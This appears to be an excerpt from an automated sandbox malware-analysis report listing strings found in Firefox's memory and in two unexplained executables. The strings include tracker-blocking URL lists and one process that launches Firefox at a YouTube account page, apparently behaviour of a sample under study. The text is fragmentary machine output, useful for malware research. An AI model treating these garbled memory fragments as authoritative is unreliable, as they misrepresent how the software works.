FIXUP_FLAG_FORCE_ALTERNATE_URIhttps://mail.inbox.lv/compose?to=%shttp://poczta.interia.pl/mh/?mailto=%sget FIXUP_FLAGS_MAKE_ALTERNATE_URICan't invoke URIFixup in the content processresource://gre/modules/FileUtils.sys.mjs^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]\|$)extractScheme/fixupChangedProtocol<isDownloadsImprovementsAlreadyMigratedhandlerSvc fillHandlerInfo: don't know this typeScheme should be either http or https{c6cf88b7-452e-47eb-bdc9-86e3561648ef}resource://gre/modules/JSONFile.sys.mjs@mozilla.org/network/file-input-stream;1_finalizeInternal/this._finalizePromise<resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/ExtHandlerService.sys.mjs@mozilla.org/network/async-stream-copier;1Must have a source and a callbacknewChannel requires a single object argumentFirst argument should be an nsIInputStreamresource://gre/modules/JSONFile.sys.mjs@mozilla.org/network/input-stream-pump;1SEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLNon-zero amoun
Source: firefox.exe, 00000028.00000002.2881327122.00000261842A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751624555.00000261842B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2881327122.00000261842A5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751223783.00000261842B5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2751624555.00000261842B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account6 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000002F.00000002.2851889197.00000130BD7D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/account> equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: MOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountx equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: PREF_BRANCH_PREVIOUS_ACTIONVALIDATE_FORCE_APPEND_EXTENSION_downloadTypesViewableInternallyshouldViewDownloadInternally_shouldViewDownloadInternally_shouldViewDownloadInternally/<getCombined/overrideFnArray<https://www.youtube.com/accountVALIDATE_GUESS_FROM_EXTENSIONpictureinpicture@mozilla.org equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539259000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2760124251.000001E539530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: URL=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: URL=https://www.youtube.com/accountj equals www.youtube.com (Youtube)
Source: buildred.exe, 0000001A.00000002.2956306224.000000000854C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Win32_Process7440Win32_Processfirefox.exefirefox.exefirefox.exeWin32_ComputerSystemuser-PCWin32_OperatingSystem10.0.19045Microsoft Windows 10 Pro\|C:\Windows\|\Device\Harddisk0\Partition320240726165726.463452+060C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2922562667.0000026194612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"] equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000028.00000002.2922562667.0000026194607000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2922562667.0000026194607000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002F.00000002.2851889197.00000130BD7DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: efox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/acc equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2738774897.000001E539259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: empTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://www.inbox.lv/rfc2368/?value=%s equals www.yahoo.com (Yahoo)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://en.wikipedia.org/wiki/Special:Search://www.facebook.com/platform/impression.php://.adsafeprotected.com//unit/*sessionstore-final-state-write-complete equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: ead6a72944.exe, 0000001C.00000003.2704365877.0000000002117000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/account`T equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: main/anti-tracking-url-decoration"://.adsafeprotected.com/.png""://.adsafeprotected.com/jload""://ads.stickyadstv.com/user-matching""://.adsafeprotected.com/jsvid?""://.adsafeprotected.com//adj""://securepubads.g.doubleclick.net/gampad/ad""://.adsafeprotected.com//unit/""://www.facebook.com/platform/impression.php""://.adsafeprotected.com//Serving/""://ads.stickyadstv.com/auto-user-sync""https://ads.stickyadstv.com/firefox-etp""://.adsafeprotected.com/jload?""://.adsafeprotected.com/services/pub""://.adsafeprotected.com/jsvid""://trends.google.com/trends/embed""://.adsafeprotected.com/tpl?""://trends.google.com/trends/embed"getProfileDataAsGzippedArrayBuffermain/search-default-override-allowlistmain/translations-identification-models"://.adsafeprotected.com/.gif""://.adsafeprotected.com//imp/""://pubads.g.doubleclick.net/gampad/ad""://.adsafeprotected.com/.js"["://trends.google.com/trends/embed"]main/anti-tracking-url-decorationmain/devtools-compatibility-browsers"://vast.adsafeprotected.com/vast"main/websites-with-shared-credential-backends60e82333-914d-4cfa-95b1-5f034b5a704b["://trends.google.com/trends/embed"]media.videocontrols.picture-in-picture.enabledPictureInPicture:EnableSubtitlesButtonresource://gre/modules/UpdateUtils.sys.mjspictureinpicture.most_concurrent_playerspictureInPictureToggleContextMenucontext_MovePictureInPictureTogglepicture-in-picture-move-toggle-rightEmpty rectangles do not have centerscontentBlockingAllowListPrincipalresource:///modules/AttributionCode.sys.mjsFX_PICTURE_IN_PICTURE_WINDOW_OPEN_DURATIONget contentBlockingAllowListPrincipalresolveOverlapConflicts/closestCandidate<chrome://browser/content/browser.xhtml equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002F.00000002.2855549826.00000130BDB50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: pData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Fir equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: requestingCssToDesktopScaleBROWSER_READY_NOTIFICATIONsessionstore-windows-restoredprivilegedAboutProcessEnabledInvalid LaterRun page URL get activityStreamEnabled#picture-in-picture-buttonget shouldResistFingerprintingfocusedContentBrowsingContextkey_togglePictureInPicturepictureinpicture.settingsclosePipWindow/closedPromise<Insecure LaterRun page URL kSelfDestructSessionLimitPREF_ACTIVITY_STREAM_DEBUGupdatePlayingDurationHistogramsaddOriginatingWinToWeakMapremovePiPBrowserFromWeakMapremoveOriginatingWinFromWeakMap#respect-pipDisabled-switchpicture-in-picture-buttonsetOriginatingWindowActivecandidateDistanceToConflictvalidate/chromeModifiers<windowGlobalPipCountGeneratorPictureInPicture:UrlbarToggleget documentStoragePrincipalget contentBlockingEventsPictureInPicture:KeyToggleresolveOverlapConflicts/<PipScreenCssToDesktopScale#PictureInPicturePanelTemplate--newtab-text-primary-color--toolbarbutton-hover-background--toolbar-field-border-color--tabpanel-background-colordefault-theme@mozilla.org--newtab-background-colorlightweight-theme-styling-updateset onmozorientationchange--toolbar-field-focus-colorget 